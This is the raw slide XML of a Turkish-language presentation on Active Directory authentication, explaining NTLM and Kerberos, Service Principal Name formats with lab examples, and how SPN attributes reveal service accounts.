              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Protokolleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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58850EB-60CF-B18B-5584-AC2E060CF9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19738" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çoğunlukla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>• NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> hem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> hem de domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bazında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sunucusuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>gereklidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>• NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eksiklikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılmaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>önerilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bağımlılıklardan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dolayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>devam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>• Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokollerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>asıl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>amacı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>herhangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>verisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>göndermeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapabilmektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A black silhouette of three horses&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720B33B2-40A1-AA68-757E-A72E7B2075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78976" y="2226597"/>
            <a:ext cx="4174824" cy="28597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426147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82F43-66AD-24AB-B1C6-9FE4380B0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Service Principal Name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8D686-8E08-40C9-4632-A1827724F6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Service Principal Name (SPN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> hangi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönettiğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>göstermektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>protokolünde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sırasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kontroller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sırasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aşağıdaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>formatlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>{Service Name} / {Host FQDN or NETBIOS Name} / {Port} / {Instance Name} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>MSSQLSVC/SQLSRV01.fslab.local:1433:instance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>MSSQLSVC/SQLSRV01.fslab.local:1433 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>MSSQLSVC/SQLSRV01.fslab.local </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>MSSQLSVC/SQLSRV01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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F3DE62CB-7F9F-3357-A3E8-464B6C4C9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264" y="1825625"/>
            <a:ext cx="3981472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58466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15C16-77A5-B806-D2AC-661B88AA3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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Kerberos SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kullanımı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77A2A-6231-41C1-E871-3D42DD82CC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Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>protokolünde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>servislere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bilgisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>zorunludur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>çalışamamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>işlem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yapılması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>isteniyorsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kaynağa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>erişilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gerekmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bilgileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ServicePrincipalNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>attributunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tutulmaktadır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36419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6CC09-7821-08E7-5088-349AF144B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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Kerberos SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kullanımı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8E630-3177-B67B-4622-07A8B627B6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SPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bilgileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ServicePrincipalNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>attributunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tutulmaktadır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Bu attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>servis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>edilebilmektedir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0486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5E2B0-949A-8EAA-549A-AD1761D95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Kerberos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A695C70-9FEF-2D80-6FFA-1AEF51D992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Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
